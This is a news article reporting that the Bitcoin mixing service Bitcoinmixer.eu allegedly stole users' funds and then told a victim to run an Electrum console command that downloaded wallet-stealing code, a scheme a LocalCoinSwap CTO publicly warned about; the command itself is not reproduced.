A bitcoin mixing service, a service used to mix various transactions to improve privacy on the Bitcoin blockchain, has been reportedly found to be scamming users by both stealing their BTC and then trying to get access to their device.
On Reddit, a user detailed he tried to use a bitcoin mixing service called Bitcoinmixer.eu to make his funds untraceable, but saw that “something in the mixing process failed.” After contracting the server’s support, he was told to run a command with his Bitcoin wallet’s console to request his funds back.
After running the command multiple times, the user got the same reply: “server exception, please, contact with support.” After asking for help on social media, others warned him he was being scammed by the bitcoin mixing service.
The CTO o LocalCoinSwap, Nathan Worsley, replied to the user’s thread warning him to not run the command he was given. Per his words it’s a “remote code execution” and there’s “no legitimate reason” to ask a user to run it. In a follow-up on GitHub, he detailed the code is designed to work with multiple operating systems.
You are being asked to run this command in a Python shell (Electrum console). That command makes an API call to download code, and then it immediately runs that code on your computer with no protections. That code could install a keylogger, or hand over the private keys to any coins you later handle with your computer.
He added that in this specific instance wallet-stealing code was being downloaded, and advised the user to at the very least “completely delete all traces of Electrum from your system and reinstall it” as the malware compromised the installation.
On GitHub, he concluded Bitcoinmixer.eu was attempting to steal its users’ BTC:
First, they blatantly steal funds during the mixing service, and then after the user contacts support they are victimized with a further attempt to completely clean out their wallet.
Since the warning was issued, Bitcoinmixer.eu want offline and is, at press time, still down. It’s worth noting bitcoin mixing services aren’t well regarded by law enforcement, as in May last year authorities took down one of the three largest cryptocurrency mixing services in the world, Bestmixer.io.
Phishing attacks are also fairly common in the cryptocurrency space. In December 2018 hackers pulled a pushing attack on the popular Electrum wallet, tricking users to get a malicious version of its software to steal their funds. The attack netted the hackers over 200 BTC.
Featured image via Pixabay.